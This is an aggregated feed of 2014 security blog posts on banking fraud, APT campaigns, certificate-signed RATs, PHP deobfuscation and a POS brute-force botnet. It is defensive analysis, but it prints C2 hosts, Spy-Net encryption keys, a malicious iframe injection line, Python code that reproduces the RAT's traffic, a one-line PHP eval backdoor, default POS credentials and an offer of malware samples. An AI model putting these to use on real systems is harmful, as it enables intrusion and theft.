
Hacker claims breach of Wall Street Journal and Vice websites, punts 'user data' for sale

Also supposedly hit a gadgets site called 'CNET'

A hacker known for attacking news websites has claimed successful hacks against both the Wall Street Journal and Vice.…

Posted: 22 Jul 2014 | 7:14 am

Finding Holes in Banking Security: Operation Emmental


Like Swiss Emmental cheese, the ways your online banking accounts are protected might be full of holes. Banks have been trying to prevent crooks from accessing your online accounts for ages. Passwords, PINs, coordinate cards, TANs, session tokens: all of these were created to help prevent banking fraud. We recently came across a criminal operation that aims to defeat one of these tools, session tokens. Here's how they pull it off.

This criminal gang intends to target banks that use session tokens sent through SMS (i.e., text messaging). This is a two-factor authentication method that uses the user's phone as a secondary channel. Trying to log into the banking site prompts the bank to send the user an SMS containing a number. Users need to enter that number along with their regular username and password in order to transact with the bank. By default, this is used by some banks in Austria, Sweden, Switzerland, and other European countries.

Cybercriminals spam users from those countries with emails spoofing well-known online retailers. The users click a malicious link or attachment and get their computers infected with malware. So far, all this is fairly typical and from a threat perspective, a bit boring.

But here's where it gets interesting. The users' computers don't really get infected, at least not with the usual banking malware. The malware only changes the configuration of the computer and then removes itself. How's that for an undetectable infection? The changes are small, but they have big repercussions.

Here's how it works: the computer's DNS settings are changed to point to a foreign server controlled by the cybercriminals. The malware also installs a rogue SSL root certificate on the system, so that the criminals' HTTPS servers are trusted by default and the user sees no certificate warning.

Figure 1. What happens in the 2-factor authentication process when the PC is infected in Operation Emmental

Now, when users with infected computers try to access the bank’s website, they are instead pointed to a malicious site that looks like that of their bank. So far, this is just a fancy phishing attack but these criminals are much more devious than that. Once the users enter their credentials, they are instructed to install an app on their smartphone.

This malicious Android app is disguised as the bank's session token generator. In reality, it intercepts SMS messages from the bank and forwards them to a command-and-control (C&C) server or to another mobile phone number. This means that the cybercriminals not only get the victims' online banking credentials through the phishing website, but also the session tokens needed to bank online. The criminals end up with full control of the victims' bank accounts.

How’s that for a big malware operation? Localized spam runs, nonpersistent malware, rogue DNS servers, phishing pages, Android malware, C&C servers, and the real back-end servers. You can’t say these criminals are lazy.

The criminals behind this particular operation target Internet users in Switzerland, Austria, and Sweden. Just this May, they added Japanese Internet users to their list of potential victims. We were able to trace the operators back to the online nicknames -=FreeMan=- and Northwinds. These actors have been active since 2011. Back then, they spread off-the-shelf malware like SpyEye and Hermes. Looking at the binaries that were recently deployed, we think the actors made use of at least two different crypting services. One of these crypting services is run by an individual from Uzbekistan. We have not been able to identify the other crypting service.

More information about this attack may be found in our Finding Holes: Operation Emmental white paper, where we discuss this technique in depth. SWITCH.CH, the CERT for Universities in Switzerland, also did research on Emmental and published their findings on their site.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro


Posted: 22 Jul 2014 | 5:10 am

Dirty Dozen Spampionship – which country is spewing the most spam?

The World Cup may be done and dusted, but the Spampionship continues! Where did you come in our spam-sending league tables?

Posted: 22 Jul 2014 | 4:53 am

Haunted by APT

Over the past decade, APT groups have intensely targeted organizations and individuals across India. Its developing base of technology, its geographical location and bounds, its inclusive and riotous political energy, and its growing economic weight make it a special place of interest for badly intentioned cyber attackers. The list of APT groups targeting Indian organizations is unfortunately quite long. A few interesting mentions include Gh0stNet, Shadownet, an Enfal actor, Red October, NetTraveler, the LuckyCat actor, the Turla APT, a Mirage actor, and the Naikon crew. There are many more. And, in unique cases, we have seen unusual new techniques, some for infiltrating mobile devices by the Chuli attackers, the Sabpub attackers' focus on Apple's OS X devices, various effective watering holes, and the generally noisy, targeted activity we would expect from most of these actors.


More recently in March, we saw a pickup in offensive activity on Indian organizations invested in environmental, economic and government policy. This crew has been targeting organizations for a few years now with an unusual offensive WMI technique that continues to be effective. The components have been called WMIGhost or Shadow. These attackers, like others currently active, are generally re-using current headline geopolitical event spearphishing themes to establish a foothold in target organizations. For example, in a March 2014 attack, this actor used an upcoming meeting between national energy labs and the Departments of Energy as their spearphishing lure, filename mis-spellings and all, "India US strategic dialouge press release.doc" (000150415302D7898F56D89C610DE4A9).


From there, the dropper and component chain is the same one they have used in the past. Successful exploitation drops "dw20.exe" (803e8f531989abd5c11b424d8890b407) --> "gupdate.exe" (481f8320b016d7f57997c8d9f200fe18) and "~tmpinst.js" (6a279a35141e9a7c73a8b25f23470d80). The script instantiates WMI objects for communications, complete with Comment Crew-like encoded WordPress site instructions that redirect the backdoor to the appropriate command-and-control server for further instruction.

Along with other groups, WMIGhost attackers are actively hitting Indian targets. In another recent WMIGhost campaign this year, a spoofed unclassified military document was sent simultaneously to several Indian targets with the consistent WMIGhost toolchain, "united states air force unmanned aircraft systems flight plan 2009-2047.doc".


We observe more of these current attacks occurring throughout the country on government and military agencies, NGOs, subcontractors and technology developers, with an expanding scope of targets.

Of these groups to date, NetTraveler was the most prolific, and in many ways the most successful at exfiltrating large volumes of information. The NetTraveler crew spent a disproportionate amount of effort and attention on extracting data from Indian organizations overall. NetTraveler is stealing GB of data from victims all over the globe, including the many victims in India. An example of their past spearphish decoys deployed to India is displayed here. The content encompasses Indian political issues, current at the time of delivery:


Meanwhile, other actors are currently working to exfiltrate more data out of India. Multiple levels of Indian organizations are frightfully pounded with spearphish and webserver attacks with no end in sight.

Posted: 21 Jul 2014 | 9:15 pm

CZ Solution Ltd. signed samples of Xtreme Rat, Zeus, Spy-Net, Gh0st, BozokRAT and other

Here are all samples (+ more) mentioned in this post by FireEye: "The Little Signature That Could: The Curious Case of CZ Solution".
All files are digitally signed with a "CZ Solutions" certificate, making it easy to create a YARA or ClamAV signature.

A few Zeus samples seem to be still beaconing. Most are sinkholed.
The certificate is now revoked by VeriSign.



Download. Email me if you need the password

File Information

Listed by Fireeye 
  1. Xtreme Rat_78CED3B6C04D372CE10B6B8606B3B747 78ced3b6c04d372ce10b6b8606b3b747
  2. Spy-Net 2.6_6A56F6735F4B16A60F39B18842FD97D0 6a56f6735f4b16a60f39b18842fd97d0
  3. Xtreme Rat_7C00BA0FCBFEE6186994A8988A864385.msg 7c00ba0fcbfee6186994a8988a864385
  4. XtremeRAT 3.5 Private _2E776E18DEC61CF6CCD68FBACD55FAB3 2e776e18dec61cf6ccd68fbacd55fab3
  5. XtremeRAT 3.5 Private _BD70A7CAE3EBF85CF1EDD9EE776D8364 bd70a7cae3ebf85cf1edd9ee776d8364
  6. XtremeRAT 3.5 Private_0BE3B0E296BE33903BF76B8CD9CF52CA 0be3b0e296be33903bf76b8cd9cf52ca
  7. XtremeRAT 3.5 Private_7416EC2889227F046F48C15C45C102DA 7416ec2889227f046f48c15c45c102da
  8. XtremeRAT 3.5 Private_BE47EC66D861C35784DA527BF0F2E03A be47ec66d861c35784da527bf0f2e03a
  9. XtremeRAT 3.5 Private_C27232691DACF4CFF24A4D04B3B2896B c27232691dacf4cff24a4d04b3b2896b
  10. XtremeRAT 3.5 Private_E79636E4C7418544D188A29481C100BB e79636e4c7418544d188a29481c100bb
  11. Zeus_9C11EF09131A3373EEF5C9D83802D56B 9c11ef09131a3373eef5c9d83802d56b
  12. Zeus_DCD3E45D40C8817061F716557E7A05B6 dcd3e45d40c8817061f716557e7a05b6

Additional (mix of RATs and Trojans)

  1. 2D186068153091927B26CD3A6831BE68 2d186068153091927b26cd3a6831be68
  2. 4A997E3395A8BB8D73193E158289F4CE 4a997e3395a8bb8d73193e158289f4ce
  3. 7E92A754AAAA0853469566D5DBF2E70C 7e92a754aaaa0853469566d5dbf2e70c
  4. 9CFD17C48FC0D300E4AA22E2C8C029D6 9cfd17c48fc0d300e4aa22e2c8c029d6
  5. 37FEE821695B664EBE66D55D8C0696F2 37fee821695b664ebe66d55d8c0696f2
  6. 445C22E94EAB61B3D4682824A19F8E92 445c22e94eab61b3d4682824a19f8e92
  7. 819B4C40F56F69C72E62EF06C85EA3E1 819b4c40f56f69c72e62ef06c85ea3e1
  8. 947C21CB8E28B854FF02C2241399A450 947c21cb8e28b854ff02c2241399a450
  9. 2859089CC3E31DA60C64D56C416175E2 2859089cc3e31da60c64d56c416175e2
  10. A9EE1BF62DEE532BE2BE217D3E4A8927 a9ee1bf62dee532be2be217d3e4a8927
  11. AC87BC7DD4B38FA3EBA23BF042B160CE ac87bc7dd4b38fa3eba23bf042b160ce
  12. B953FD2B3D5C10EC735681982D3C6352 b953fd2b3d5c10ec735681982d3c6352
  13. BD5188031BB8EB317FB58F0A49CCBF9C bd5188031bb8eb317fb58f0a49ccbf9c
  14. D7CF30E3DBFD32A1D1E38CEE464EC6A6 d7cf30e3dbfd32a1d1e38cee464ec6a6
  15. E1AFC706C8C96FACEDB6CB62E6CBFD2D e1afc706c8c96facedb6cb62e6cbfd2d
  16. Gh0stB_7A26BBD7B5942B49FC0A9CB7268BD030 7a26bbd7b5942b49fc0a9cb7268bd030
  17. SpyRat_E0B0BBA2F6399B0577C37E2A3BC3390A e0b0bba2f6399b0577c37e2a3bc3390a
  18. Zeus_0D8F9C5898596251233C3FD1DCB34161 0d8f9c5898596251233c3fd1dcb34161
  19. Zeus_7A6BBC32868A9F776452355F909F95D6 7a6bbc32868a9f776452355f909f95d6
  20. Zeus_7CD6C4A6103F23858C7ED047391F1D3B 7cd6c4a6103f23858c7ed047391f1d3b
  21. Zeus_52BE0408084F536E42FEB7C57F521592 52be0408084f536e42feb7c57f521592
  22. Zeus_5746DD569623431BA41A247FA64847D7 5746dd569623431ba41a247fa64847d7
  23. Zeus_A79089B5E6744C622D61BEFA40AF77D3 a79089b5e6744c622d61befa40af77d3
  24. Zeus_E2190F61B532BD51E585449BAAE31BC1 e2190f61b532bd51e585449baae31bc1
  25. Zeus_F76A509FEE28C5F65046D6DC072658B2 f76a509fee28c5f65046d6dc072658b2

Posted: 20 Jul 2014 | 9:59 pm

The Little Signature That Could: The Curious Case of CZ Solution

Malware authors are always looking for new ways to disguise their actions. Attackers want their malware not only to be fully undetectable, but also to appear legitimate on a system, so as not to draw attention. Digital signatures are one way malware authors stay under the radar, because a digital signature is an easy, quick way for a system to verify the authenticity of an application.

Threat actors routinely steal code-signing certificates to hide in plain sight. There are recent reports of banking Trojans such as Zeus using valid signatures to get past both automated and human defenses. Part of performing accurate threat intelligence is continually looking to the past to help better predict the future, and the samples discussed in this blog bear that out. Many of the samples throughout this blog are from the summer of 2013. These particular samples piqued our interest because of the mass distribution of RATs in a particular targeted region. They also reminded us of an XtremeRAT blog we published earlier in 2014.

The Little Signature That Could

While investigating an uptick in Spy-Net spam campaigns, we came across a digitally signed malware binary that caught our interest. Spy-Net allows an attacker to interact with the victim via a remote shell, upload/download files, interact with the registry, running processes and services, capture images of the desktop, and record from the webcam and microphone. It also contains functionality to extract saved passwords and turn the victim into a proxy server. During the build process, an attacker can choose to enable a keylogger and evasion functionality designed to stop the infection process if a debugger or virtual machine is found.

We noticed that one of the Spy-Net binary files, sc2.exe (MD5: 6a56f6735f4b16a60f39b18842fd97d0), upon closer inspection, carried a valid digital signature from a company called CZ Solution Co. Ltd.


Figure 1: Signature Details of sc2.exe

Looking closer at the signature, we noticed that all of the details were intact, and appeared to be valid. There are two additional code-signing certificates issued to CZ Solution Co. Ltd.


Figure 2: Additional Signature Details

Investigation of sc2.exe showed typical Spy-Net behaviors. The sample beaconed out to ekinox.no-ip.info. From here, we decided to pivot off the CZ Solution signature and see what we could find.

Connections Emerge

As we started to pivot off the CZ Solution signature, we began to see some interesting commonalities. Pivoting showed that the CZ Solution signature was not used only in Spy-Net binaries. We quickly found that it was also being used with XtremeRAT, a popular RAT that cybercriminals and targeted attackers use regularly. The code of XtremeRAT is shared amongst several other Delphi RAT projects including Spy-Net, CyberGate, and Cerberus.

XtremeRAT allows an attacker to:

One binary for instance, m.exe (MD5: c27232691dacf4cff24a4d04b3b2896b) which was XtremeRAT, was seen beaconing out to http://omegaphotography.[co].uk, batardchris.servehttp.com /1234567890.functions, and www.batteurmag.com/[plugin].xtr.

Likewise, we saw multiple samples of the Zeus Trojan utilizing the CZ Solution signature. Zeus operators can tune Zeus to steal the information they are interested in, typically login credentials for online social networks, e-mail accounts, online banking or other online financial services. Zeus is commonly seen targeting customers of financial institutions.

One of the Zeus samples, uk.exe (MD5: dcd3e45d40c8817061f716557e7a05b6) that was utilizing the CZ Solution signature, was beaconing out to claire-morin.com/file.php.

Looking at the three samples shows that the CZ Solution certificate was used to sign Spy-Net, XtremeRAT, and Zeus samples. Graphing out the connections between the samples we profiled, you can quickly see how fast this web of similarities grows.

Figure 3: Connection Profile of Binaries Using CZ Solution

The French Connection and C2 overlap

Attribution of actors and/or campaigns can often be a difficult and tedious task. However, since we were dealing with so many inter-twining binaries, we could start to draw some parallels between samples.

When looking at the overall connections between binaries carrying the CZ Solution signature, a trend starts to emerge. First, there is some C2 overlap. For instance, Dllsv.exe (MD5: 3f042fd6b9ce7e23b3c84c6f7323dd75) communicates out to ekinox.no-ip.info and is signed with the same CZ Solution cert. This malware is flagged as BozokRAT, a user-friendly RAT that can upload and download files to and from a computer, modify registry entries, and perform other typical RAT functions. That same C2, ekinox.no-ip.info, is also used by the aforementioned Spy-Net binary, sc2.exe (MD5: 6a56f6735f4b16a60f39b18842fd97d0).

In another example of C2 overlap, a file named uk.exe (MD5: 9c11ef09131a3373eef5c9d83802d56b) uses omega-photography.co.uk as its C2. This sample is an active Zeus binary. That same C2 is used by a file named x.exe (MD5: c27232691dacf4cff24a4d04b3b2896b), an active XtremeRAT binary.

Next, we needed to identify at least one infection vector to ensure we could track how one of the binaries using the CZ Solution signature was getting into environments.

In one case, we found the infection vector for an XtremeRAT binary that was using the CZ Solution certificate. The binary came in the form of a phishing email (MD5: 7c00ba0fcbfee6186994a8988a864385) purportedly from Armani regarding an order.


The email was in French and the headers were interesting, as the same sender has been seen in multiple French spam runs.


The attachment in the email uses the right-to-left override (RTLO) trick to disguise a 7zip file as a PDF.

While looking at all the samples we correlated and pivoted off of, we found that the majority of both the language and the C2s being used revolved around French. The domains that were part of the C2 infrastructure were almost exclusively French, as was the registrant information for the domains in question.

Spy-Net C2 Protocol Analysis

As we have already shared some analysis details of XtremeRAT in a previous blog, we decided to share some information and tools we built regarding Spy-Net this time. This information is based on our analysis of Spy-Net version 2.6 specifically. Other versions of Spy-Net may have significant changes to the protocol. Spy-Net 2.6 uses a homegrown protocol like many other publicly available RATs. It's an ASCII-based, pipe-delimited protocol using Portuguese keywords that employs two totally different forms of obfuscation: one for outbound communication to the attacker and another for inbound communication to the implant. The outbound communications are compressed with zlib and then encrypted with RC4. The RC4 key is hard-coded and changes with the version. For example, the RC4 key for Spy-Net 2.6 is njkvenknvjebcddlaknvfdvjkfdskv, while for CyberGate 1.07, which has a similar (if not the same) protocol, the key is njgnjvejvorenwtrnionrionvironvrnvcg107, and CyberGate 1.18's key is njgnjvejvorenwtrnionrionvironvrnvcg117.

The astute reader may have noticed that the last three numbers of the CyberGate keys (roughly) represent the version number of CyberGate. The inbound communication to the implant employs an ASCII encoding scheme similar to Base64.  This protocol begins with a simple authentication scheme where the implant sends an authentication password that is validated by the client. This password is configurable by the attacker and defaults to abcd1234.  The implant then proceeds to send the entirety of its configuration information, as configured by the attacker, to the client so it can be displayed on its “Configuration” tab.


Authentication

Implant->Client: mypassword|Y|

Configuration Request and Response

Client->Implant: configuracoesdoserver|

Implant->Client: configuracoesdoserver|configuracoesdoserver||#myID|mypassword|C:\WINDOWS\install\server.exe|C:\Program Files\Internet Explorer\iexplore.exe| | |{0OP8GNN1-GIWW-CC7M-AJ0I-6Y554UOJJ241}|Policies|FALSE|TRUE|TRUE|TRUE|***MUTEX***| | |TRUE|FALSE| | | | | | |FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|server.exe#crack.exe#|FALSE|

The outbound communications from the implant to the client are prepended with an ASCII representation of the length of the payload followed by a pipe character and a new line character.


There is a noticeable lack of sophistication in Spy-Net’s code. For example, in some cases the length indicator is followed by a pipe and a single new line (\n) character as seen in *nix based operating systems. In other cases, the indicator is followed by the carriage return and new line characters (\r\n), as seen in Windows operating systems. This lack of conformity is also witnessed in how there are two totally different schemes used for obfuscation, and in how obfuscation is not used for file transfers as it is otherwise used throughout the protocol.
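The outbound (implant to client) channel described above, written out as an added example in Python; this is not the ChopShop module or any code from the post. It implements RC4 with the Spy-Net 2.6 key quoted above, the zlib-then-RC4 obfuscation, the "<length>|" framing with either line terminator, and a parser that pulls the ID, password, install path and mutex out of the configuracoesdoserver response. Two things are assumptions rather than facts from the post and are marked as such in the code: that the length indicator counts the obfuscated payload bytes, and the positions of the fields, which are read off the sample response above (the field names are this example's own labels).

```python
"""Spy-Net 2.6 implant->client channel codec (added example, not ChopShop code).

The post describes the outbound direction as pipe-delimited ASCII fields,
zlib-compressed, RC4-encrypted with a hard-coded per-version key, and framed
as "<ascii length>|" followed by "\n" or "\r\n".
"""
import zlib

SPYNET_26_KEY = b"njkvenknvjebcddlaknvfdvjkfdskv"          # key quoted in the post
CYBERGATE_107_KEY = b"njgnjvejvorenwtrnionrionvironvrnvcg107"
CYBERGATE_118_KEY = b"njgnjvejvorenwtrnionrionvironvrnvcg117"


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Symmetric: one call both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def frame_outbound(fields, key=SPYNET_26_KEY, eol=b"\n") -> bytes:
    """Build one implant->client frame: join fields with '|', compress, encrypt,
    then prepend the ASCII length, a pipe and the line terminator.
    Assumption: the length counts the obfuscated payload, not the plaintext."""
    plain = ("|".join(fields) + "|").encode("latin-1")
    payload = rc4(key, zlib.compress(plain))
    return str(len(payload)).encode("ascii") + b"|" + eol + payload


def parse_outbound(stream: bytes, key=SPYNET_26_KEY):
    """Split a captured implant->client byte stream into lists of fields,
    accepting both the '\n' and the '\r\n' variants the post mentions."""
    messages = []
    pos = 0
    while pos < len(stream):
        bar = stream.index(b"|", pos)
        length = int(stream[pos:bar])
        pos = bar + 1
        if stream.startswith(b"\r\n", pos):
            pos += 2
        elif stream.startswith(b"\n", pos):
            pos += 1
        else:
            raise ValueError("unexpected frame terminator at offset %d" % pos)
        payload = stream[pos:pos + length]
        if len(payload) != length:
            raise ValueError("truncated frame at offset %d" % pos)
        pos += length
        plain = zlib.decompress(rc4(key, payload)).decode("latin-1")
        messages.append(plain.split("|"))
    return messages


# Field positions read off the configuracoesdoserver response quoted in the post;
# the names are this example's own labels, not Spy-Net's.
CONFIG_FIELDS = {"id": 3, "password": 4, "install_path": 5, "inject_target": 6, "mutex": 15}


def parse_config(fields):
    """Pull the interesting settings out of a configuration response."""
    if not fields or fields[0] != "configuracoesdoserver":
        raise ValueError("not a configuration response")
    if len(fields) <= max(CONFIG_FIELDS.values()):
        raise ValueError("configuration response too short")
    cfg = {name: fields[idx] for name, idx in CONFIG_FIELDS.items()}
    cfg["id"] = cfg["id"].lstrip("#")          # the sample shows "#myID"
    return cfg


if __name__ == "__main__":
    # Constructed traffic: the auth message and the config response from the post.
    config = ["configuracoesdoserver", "configuracoesdoserver", "", "#myID", "mypassword",
              r"C:\WINDOWS\install\server.exe",
              r"C:\Program Files\Internet Explorer\iexplore.exe", " ", " ",
              "{0OP8GNN1-GIWW-CC7M-AJ0I-6Y554UOJJ241}", "Policies", "FALSE", "TRUE",
              "TRUE", "TRUE", "***MUTEX***"]
    pcap_bytes = frame_outbound(["mypassword", "Y"]) + frame_outbound(config, eol=b"\r\n")
    for msg in parse_outbound(pcap_bytes):
        print(msg[0], parse_config(msg) if msg[0] == "configuracoesdoserver" else "")
```

Because RC4 with a fixed key is a stream cipher reused across every session, the same keystream position always masks the same plaintext offset; that is why a static key per version is enough to decode any capture, and why swapping in CYBERGATE_107_KEY is all it takes to try a CyberGate capture against the same parser.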

Spy-Net Protocol Decoder

Since Spy-Net is a publicly available RAT that we see in use quite often, we decided to build a ChopShop module for it and share it in cooperation with our friends at MITRE.  The module is now available as a standard part of the framework available on GitHub.  We are also sharing a Spy-Net configuration dumping pycommand for Immunity Debugger.  While hunting for related samples in VirusTotal, we came across a pcap that had captured the initial infection and subsequent communication of the Spy-Net binary we initially mentioned, (MD5: 6a56f6735f4b16a60f39b18842fd97d0). This gave us a great opportunity to test our new decoder. One thing that Spy-Net implants will commonly send out automatically is a thumbnail image of the user’s desktop. This is displayed on the client.


Our decoder can extract such images from the pcap, and what we found gave us a further hint that we may be dealing with attacks focused in France. Although difficult to read due to the very low resolution of the thumbnail, our pcap decoder was able to tell us that the title of the browser window open in this screenshot is "Football – MAXIFOOT l'actualité foot et transfert – Windows Internet Explorer."


Distribution via Malicious Java Applet

According to the details of the pcap we decoded, this French football Web site (maxifoot.fr) was apparently compromised and had an iframe inserted into it that pointed to another compromised Web site, a Canadian addiction recovery resource: unwasted.ca.

<iframe width="1px" height="1px" src="hxxp://unwasted.ca/skins/index.html" style="display: block;" ></iframe>

The latter site hosted a malicious Java applet that downloaded the Pony/Fareit malicious downloader. The downloader then proceeded to install ZeuS and download and execute the aforementioned Spy-Net binary. All of these binaries were signed with the stolen digital certificate. The malicious Java applet used to install the Pony downloader was created by Foxxy Software and had been previously written about by ESET.

RAT Configuration Details

We assembled a compilation of the meaningful configuration data found in the XtremeRAT and Spy-Net samples we came across in our analyses. You can observe some similarities between the samples’ configurations.

MD5                               Version                Dir/Path                                  ID           Group      Mutex     Password
f5e6c0a2c9000311513521947a76cb4b  Spy-Net 2.6            C:\WINDOWS\system32\conhost\conhost.exe   Updater2014  NA         R5438NM5  abcd1234
6a56f6735f4b16a60f39b18842fd97d0  Spy-Net 2.6            C:\WINDOWS\system32\Winini\taskhost.exe   Uframer      NA         A7TF5W    abcd1234
7416ec2889227f046f48c15c45c102da  XtremeRAT 3.5 Private  InstallDir                                SpaM         SPAM       eyA8znpc  NA
2e776e18dec61cf6ccd68fbacd55fab3  XtremeRAT 3.5 Private  svhost                                    Diesel       Diesel     lNFAH0    NA
be47ec66d861c35784da527bf0f2e03a  XtremeRAT 3.5 Private  svhost                                    IdSec        USA3       lNFAH0    NA
c27232691dacf4cff24a4d04b3b2896b  XtremeRAT 3.5 Private  InstallDir                                IdSec        idsection  eyA8znpc  NA
e79636e4c7418544d188a29481c100bb  XtremeRAT 3.5 Private  svhost                                    IdSec        USA3       lNFAH04   NA
bd70a7cae3ebf85cf1edd9ee776d8364  XtremeRAT 3.5 Private  svhost                                    IdSec        IdSec      lNFAH0    NA
0be3b0e296be33903bf76b8cd9cf52ca  XtremeRAT 3.5 Private  svhost                                    CiTa         IdSec      x4KybsbM  NA


The usage of digital signatures isn't going to decrease anytime soon, especially by threat actors. It gives them a quick, easy way to bypass traditional security controls, since certificates and signatures are typically trusted by default. This blog shows that the trend still holds. We looked towards the past in this blog to better understand motivations and trends going forward. We can say, based on the information gathered, that the CZ Solution signatures were being utilized by an individual or group of individuals using French assets and infrastructure.

These particular actors didn't show a significant level of expertise, but did show collective resources with knowledge of at least Zeus, Spy-Net, and XtremeRAT. It is likely these actor(s) were using the same signature to send out a wide range of binaries, possibly even outside the four families discussed here. As we wrote this blog, we couldn't help but be reminded of the spam run focused on Colombia and Central America that we wrote about in February of this year: a spam run that is regionally focused, but with no apparent targeting, utilizing a mix of ZeuS and off-the-shelf RATs.

Helping protect your organization from threats using valid digital signatures can include verification of the signature's serial number. In this case, the serial number 6e 7b 63 95 ac 5b 5c 8a 2a ec c4 52 8d 9e 65 10 is the identifier to block for this publisher. Note that a serial number is only unique within the issuing CA, so match on issuer and serial together, and check revocation status rather than relying on the signature alone (the CZ Solution certificate has since been revoked by VeriSign). Also, if you're running your own internal certificate authority, ensure you are adequately revoking certificates that may have been compromised. This will help ensure compromised certificates are not utilized in attacks.


Posted: 18 Jul 2014 | 7:00 am

Reversing a PHP Script Dynamically and Statically

A reader sent me two PHP scripts because the PHP Converter program I wrote wasn’t able to handle it. They are both similar so I’ll just work on one of them in this post. Here’s what it looks like:


And this is what happens when you try to use PHP Converter:


Let’s reverse this script dynamically and then statically.

First, I’ll just change the ‘eval’ keyword to ‘echo’.


And take a peek at what’s going on.


Yikes, this is messed up! I thought the PHP file got corrupted somehow but then I looked closely and noticed several PHP keywords. This is actually a pretty clever technique. Basically the script is converting the strange characters to text but it’s surrounded by long, seemingly random strings that are variable names.

So I figure I would just write it out to a file and then change the ‘eval’ I noticed at the end to ‘echo’.


Here’s the resulting file:


I’ll just make that quick change and run it again.


Cool, now we know what this script does!

Now let’s reverse this script statically.

Here’s a new, fixed version of PHP Converter. I added a filter to present the results of the deobfuscation without stopping if it encounters any strange characters. The characters outside the alphanumeric range will be represented by a neutral character.


I also added the ability to output the result to Base64 format and/or to a file. With both options checked, you will get a text file of the result encoded in Base64 so the binary values will be preserved.


Now I can convert this base64-encoded string to text using Converter.


After cleaning this up, we can see that the section below is XOR'ing the blob using the decimal value 30, which is assigned to the first variable.


I’m going to convert the base64-encoded string to hex this time.


Then send the data to Converter’s Key Search/Convert feature and set the values accordingly:


And I get this result. The junk at the top and bottom is the result of XOR’ing the original text so I can ignore that.


There are other ways to get to the final result but I think these two methods are straightforward and quick/easy to do.
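The key-search step above, done in code rather than in Converter's GUI, as an added example in Python (this is not Kahu Security's tool or the reader's script). It goes one step beyond the post: instead of taking the key 30 from the source, it tries all 256 single-byte keys on the base64-decoded blob and ranks them by how much PHP the result contains, which is what you need when the key is not sitting in plain sight. The blob is constructed inside the block (a small PHP snippet XORed with 30 and base64-encoded) as a stand-in for the one PHP Converter dumped; the scoring tokens are this example's own choice.

```python
"""Single-byte XOR key search, the automated form of the key-search step above
(added example; not Kahu Security's Converter)."""
import base64

# Tokens a decoded PHP payload is likely to contain; longer matches weigh more.
PHP_TOKENS = (b"<?php", b"eval(", b"base64_decode", b"gzinflate", b"function",
              b"preg_replace", b"$", b";", b"(", b")")


def xor_single(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def php_score(candidate: bytes) -> int:
    """Reward PHP-looking tokens, penalise bytes that are not printable ASCII."""
    hits = sum(candidate.count(tok) * len(tok) for tok in PHP_TOKENS)
    junk = sum(1 for b in candidate if not (0x20 <= b <= 0x7E or b in (0x09, 0x0A, 0x0D)))
    return hits - 4 * junk


def key_search(blob: bytes):
    """Try all 256 single-byte keys; return (score, key, plaintext) best first."""
    ranked = []
    for key in range(256):
        plaintext = xor_single(blob, key)
        ranked.append((php_score(plaintext), key, plaintext))
    ranked.sort(key=lambda r: r[0], reverse=True)
    return ranked


def search_base64(b64_text: str) -> int:
    """Base64-decode the dumped blob and return the most PHP-like key."""
    return key_search(base64.b64decode(b64_text))[0][1]


def decode_base64_xor(b64_text: str, key: int) -> bytes:
    """The one-step decode once the key is known; the post's script used key 30."""
    return xor_single(base64.b64decode(b64_text), key)


# Constructed stand-in for the base64 blob PHP Converter dumps: a small PHP
# backdoor XORed with 30 (the same key the post found) and base64-encoded.
SAMPLE_PHP = b'<?php $u = $_POST["u"]; eval(base64_decode($u)); ?>'
SAMPLE_B64 = base64.b64encode(xor_single(SAMPLE_PHP, 30)).decode("ascii")

if __name__ == "__main__":
    for score, key, text in key_search(base64.b64decode(SAMPLE_B64))[:3]:
        print(score, key, text[:40])
```

The "junk at the top and bottom" the post mentions is exactly what the penalty term is for: the parts of the blob that were plain text before the script XORed them come out as unprintable bytes under the right key, so scoring on tokens minus junk still picks the key while ignoring that residue.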

The updated version of PHP Converter can be downloaded here.

Posted: 11 Jul 2014 | 10:45 pm

Trojan:W32/Lecpetex: Bitcoin miner spreading via FB messages

In early March this year, while investigating various threats as part of our Facebook malware cleanup effort, we ran across an interesting one that was spreading in zipped files attached to messages.

The messages themselves were classic social engineering bait that led users to install the executable file in the attachment, which turned out to be a Bitcoin miner that we identify as Trojan:W32/Lecpetex.

Some of the more interesting details of our analysis are presented in our Lecpetex whitepaper.


Facebook's own investigation into Lecpetex led to an operation to take down the botnet. More details about their takedown effort, and the results from their parallel analysis of the malware, are available here.

Post by — Mangesh

Updated to add details and link to Facebook's takedown post.

On 09/07/14 At 03:22 AM

Posted: 8 Jul 2014 | 6:15 pm

Botnet bruteforcing Point Of Sale terminals via Remote Desktop

Every single day our automated systems analyze hundreds of thousands of malicious samples. Yesterday one of the samples caught my attention because the malware started performing brute-force attacks against Remote Desktop using certain usernames and passwords.

MD5: c1fab4a0b7f4404baf8eab4d58b1f821

Other similar samples:

Once started, the malware copies itself to \Documents and Settings\Administrator\Application Data\lsacs.exe and starts communicating with the C&C, sending data about the status of the bot (number of hosts brute-forced, packets per second, number of threads, version, etc.),

and the server replies with a configuration block containing:

- Login/Password list to use during bruteforcing

- Timestamp

- List of IP Addresses to attack

- Number of threads to use

- Interval 

As you can see, some of the usernames/passwords they are using (pos, pos1, pos01, shop, station, hotel, atm, atm1, micros, microssvc) are the defaults commonly used on Point of Sale terminals by retailers and businesses all around the world.

The control panel of the botnet is also hosted on the same server:

This is not new; we know cybercriminals have been using this technique to compromise Point of Sale systems for years. Once they gain access to the terminal using one of the default credentials, they upload a second-stage payload commonly known as a memory scraper, a piece of malware that searches for credit card data in memory before it has been encrypted. Some examples are:

- BlackPOS


- VSkimmer

- Alina

- RetalixScrapper

- Dexter

These pieces of malware are able to extract the credit card data from the terminal and exfiltrate the data to the attackers that will then sell the information in the black market.

When it comes to detecting the infection of a system in your network, this is how our AlienVault Unified Security Management (USM) detects a compromised asset:


